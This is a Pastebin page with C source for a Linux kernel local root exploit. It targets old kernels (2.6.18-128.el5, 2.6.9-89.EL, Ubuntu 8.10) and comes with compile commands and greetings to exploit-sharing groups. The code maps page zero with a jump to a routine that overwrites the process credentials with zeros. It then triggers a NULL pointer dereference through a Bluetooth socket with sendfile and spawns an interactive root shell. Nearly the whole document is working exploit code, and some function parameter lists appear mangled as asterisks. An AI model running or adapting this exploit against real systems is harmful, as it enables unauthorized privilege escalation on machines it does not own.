Advertisement
hollerith

IDC 2013

Feb 7th, 2021
950
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 8.28 KB | None | 0 0
  1. /*
  2.  *
  3.  *
  4.  * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                    
  5.  * 0    _                __         __      __                 1
  6.  * 1   /' \          __  /'__`\       /\ \__  /'__`\                0
  7.  * 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___         1
  8.  * 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\        0
  9.  * 0    \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/         1
  10.  * 1     \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\         0
  11.  * 0      \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/         1
  12.  * 1               \ \____/ >> Exploit database separated by exploit   0
  13.  * 0                \/___/        type (local, remote, DoS, etc.)    1
  14.  * 1                                                        0
  15.  * 0  By CrosS                                                1
  16.  * 1                                                        0
  17.  * 0  Linux 2011                                               1
  18.  * 1                                                        0
  19.  * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
  20.  *
  21.  * Linux 2.6.18-128.el5
  22.  * Linux 2.6.9-89.EL
  23.  * Ubuntu 8.10 Linux 2.6.27
  24.  *
  25.  * For i386 & ppc compile with the command;
  26.  * gcc -w -o exploit exploit.c
  27.  *
  28.  * For x86_64 kernel and ppc64 Compile as;
  29.  * gcc -w -m64 -o exploit exploit.c
  30.  *
  31.  * Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
  32.  *
  33.  * Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
  34.  *
  35.  * For Educational purpose Only))
  36.  */
  37.  
  38. #include <stdio.h>
  39. #include <stdlib.h>
  40. #include <string.h>
  41. #include <sys/mman.h>
  42. #include <sys/sendfile.h>
  43. #include <sys/types.h>
  44. #include <sys/socket.h>
  45. #include <unistd.h>
  46.  
  47. #if !defined(__always_inline)
  48. #define __always_inline inline __attribute__((always_inline))
  49. #endif
  50.  
  51. #if defined(__i386__) || defined(__x86_64__)
  52. #if defined(__LP64__)
  53. static __always_inline unsigned long
  54. current_stack_pointer(****************)
  55. {
  56.     unsigned long sp;
  57.  
  58.     asm volatile ("movq %%rsp,%0; " : "=r" (sp));
  59.  
  60.     return sp;
  61. }
  62.  
  63. #else
  64. static __always_inline unsigned long
  65. current_stack_pointer(****************)
  66. {
  67.     unsigned long sp;
  68.  
  69.     asm volatile ("movl %%esp,%0" : "=r" (sp));
  70.  
  71.     return sp;
  72. }
  73.  
  74. #endif
  75.  
  76. #elif defined(__powerpc__) || defined(__powerpc64__)
  77. static __always_inline unsigned long
  78. current_stack_pointer(****************)
  79. {
  80.     unsigned long sp;
  81.  
  82.     asm volatile ("mr %0,%%r1; " : "=r" (sp));
  83.  
  84.     return sp;
  85. }
  86.  
  87. #endif
  88.  
  89. #if defined(__i386__) || defined(__x86_64__)
  90. #if defined(__LP64__)
  91. static __always_inline unsigned long
  92. current_task_struct(****************)
  93. {
  94.     unsigned long task_struct;
  95.  
  96.     asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
  97.  
  98.     return task_struct;
  99. }
  100.  
  101. #else
  102. #define TASK_RUNNING 0
  103.  
  104. static __always_inline unsigned long
  105. current_task_struct(****************)
  106. {
  107.     unsigned long task_struct, thread_info;
  108.  
  109.     thread_info = current_stack_pointer() & ~(4096 - 1);
  110.  
  111.     if (*(unsigned long *)thread_info >= 0xc0000000) {
  112.        task_struct = *(unsigned long *)thread_info;
  113.  
  114.        /*
  115.         * The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
  116.         * in us3r-spaCe.
  117.         */
  118.        if (*(unsigned long *)task_struct == TASK_RUNNING)
  119.           return task_struct;
  120.     }
  121.  
  122.     /*
  123.     * Prior to the 2.6 kernel series, the task_struct was stored at the end
  124.     * of the kernel stack.
  125.     */
  126.     task_struct = current_stack_pointer() & ~(8192 - 1);
  127.  
  128.     if (*(unsigned long *)task_struct == TASK_RUNNING)
  129.        return task_struct;
  130.  
  131.     thread_info = task_struct;
  132.  
  133.     task_struct = *(unsigned long *)thread_info;
  134.  
  135.     if (*(unsigned long *)task_struct == TASK_RUNNING)
  136.        return task_struct;
  137.  
  138.     return -1;
  139. }
  140.  
  141. #endif
  142.  
  143. #elif defined(__powerpc__) || defined(__powerpc64__)
  144. #define TASK_RUNNING 0
  145.  
  146. static __always_inline unsigned long
  147. current_task_struct(****************)
  148. {
  149.     unsigned long task_struct, thread_info;
  150.  
  151. #if defined(__LP64__)
  152.     task_struct = current_stack_pointer() & ~(16384 - 1);
  153.  
  154. #else
  155.     task_struct = current_stack_pointer() & ~(8192 - 1);
  156.  
  157. #endif
  158.  
  159.     if (*(unsigned long *)task_struct == TASK_RUNNING)
  160.        return task_struct;
  161.  
  162.     thread_info = task_struct;
  163.  
  164.     task_struct = *(unsigned long *)thread_info;
  165.  
  166.     if (*(unsigned long *)task_struct == TASK_RUNNING)
  167.        return task_struct;
  168.  
  169.     return -1;
  170. }
  171.  
  172. #endif
  173.  
  174. #if defined(__i386__) || defined(__x86_64__)
  175. static unsigned long uid, gid;
  176.  
  177. static int
  178. change_cred(****************)
  179. {
  180.     unsigned int *task_struct;
  181.  
  182.     task_struct = (unsigned int *)current_task_struct();
  183.  
  184.     while (task_struct) {
  185.        if (task_struct[0] == uid && task_struct[1] == uid &&
  186.              task_struct[2] == uid && task_struct[3] == uid &&
  187.              task_struct[4] == gid && task_struct[5] == gid &&
  188.              task_struct[6] == gid && task_struct[7] == gid) {
  189.           task_struct[0] = task_struct[1] =
  190.           task_struct[2] = task_struct[3] =
  191.           task_struct[4] = task_struct[5] =
  192.           task_struct[6] = task_struct[7] = 0;
  193.           break;
  194.        }
  195.  
  196.        task_struct++;
  197.     }
  198.  
  199.     return -1;
  200. }
  201.  
  202. #elif defined(__powerpc__) || defined(__powerpc64__)
  203. static int
  204. change_cred(****************)
  205. {
  206.     unsigned int *task_struct;
  207.  
  208.     task_struct = (unsigned int *)current_task_struct();
  209.  
  210.     while (task_struct) {
  211.        if (!task_struct[0]) {
  212.           task_struct++;
  213.           continue;
  214.        }
  215.  
  216.        if (task_struct[0] == task_struct[1] &&
  217.              task_struct[0] == task_struct[2] &&
  218.              task_struct[0] == task_struct[3] &&
  219.              task_struct[4] == task_struct[5] &&
  220.              task_struct[4] == task_struct[6] &&
  221.              task_struct[4] == task_struct[7]) {
  222.           task_struct[0] = task_struct[1] =
  223.           task_struct[2] = task_struct[3] =
  224.           task_struct[4] = task_struct[5] =
  225.           task_struct[6] = task_struct[7] = 0;
  226.           break;
  227.        }
  228.  
  229.        task_struct++;
  230.     }
  231.  
  232.     return -1;
  233. }
  234.  
  235. #endif
  236.  
  237. #define PAGE_SIZE getpagesize()
  238.  
  239. int
  240. main(****************)
  241. {
  242.     char *addr;
  243.     int out_fd, in_fd;
  244.     char template[] = "/tmp/tmp.XXXXXX";
  245.  
  246. #if defined(__i386__) || defined(__x86_64__)
  247.     uid = getuid(), gid = getgid();
  248.  
  249. #endif
  250.  
  251.     if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
  252.           MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
  253.        perror("mmap");
  254.        exit(EXIT_FAILURE);
  255.     }
  256.  
  257. #if defined(__i386__) || defined(__x86_64__)
  258. #if defined(__LP64__)
  259.     addr[0] = '\xff';
  260.     addr[1] = '\x24';
  261.     addr[2] = '\x25';
  262.     *(unsigned long *)&addr[3] = 8;
  263.     *(unsigned long *)&addr[8] = (unsigned long)change_cred;
  264.  
  265. #else
  266.     addr[0] = '\xff';
  267.     addr[1] = '\x25';
  268.     *(unsigned long *)&addr[2] = 8;
  269.     *(unsigned long *)&addr[8] = (unsigned long)change_cred;
  270.  
  271. #endif
  272.  
  273. #elif defined(__powerpc__) || defined(__powerpc64__)
  274. #if defined(__LP64__)
  275.     /*
  276.     * The use of function descriptors by the Power 64-bit ELF ABI requires
  277.     * the use of a fake function descriptor.:P
  278.     */
  279.     *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
  280.  
  281. #else
  282.     addr[0] = '\x3f';
  283.     addr[1] = '\xe0';
  284.     *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
  285.     addr[4] = '\x63';
  286.     addr[5] = '\xff';
  287.     *(unsigned short *)&addr[6] = (unsigned short)change_cred;
  288.     addr[8] = '\x7f';
  289.     addr[9] = '\xe9';
  290.     addr[10] = '\x03';
  291.     addr[11] = '\xa6';
  292.     addr[12] = '\x4e';
  293.     addr[13] = '\x80';
  294.     addr[14] = '\x04';
  295.     addr[15] = '\x20';
  296.  
  297. #endif
  298.  
  299. #endif
  300.  
  301.     if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
  302.        perror("socket");
  303.        exit(EXIT_FAILURE);
  304.     }
  305.  
  306.     if ((in_fd = mkstemp(template)) == -1) {
  307.        perror("mkstemp");
  308.        exit(EXIT_FAILURE);
  309.     }
  310.  
  311.     if(unlink(template) == -1) {
  312.        perror("unlink");
  313.        exit(EXIT_FAILURE);
  314.     }
  315.  
  316.     if (ftruncate(in_fd, PAGE_SIZE) == -1) {
  317.        perror("ftruncate");
  318.        exit(EXIT_FAILURE);
  319.     }
  320.  
  321.     sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
  322.  
  323.     execl("/bin/sh", "sh", "-i", NULL);
  324.  
  325.     exit(EXIT_SUCCESS);
  326. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement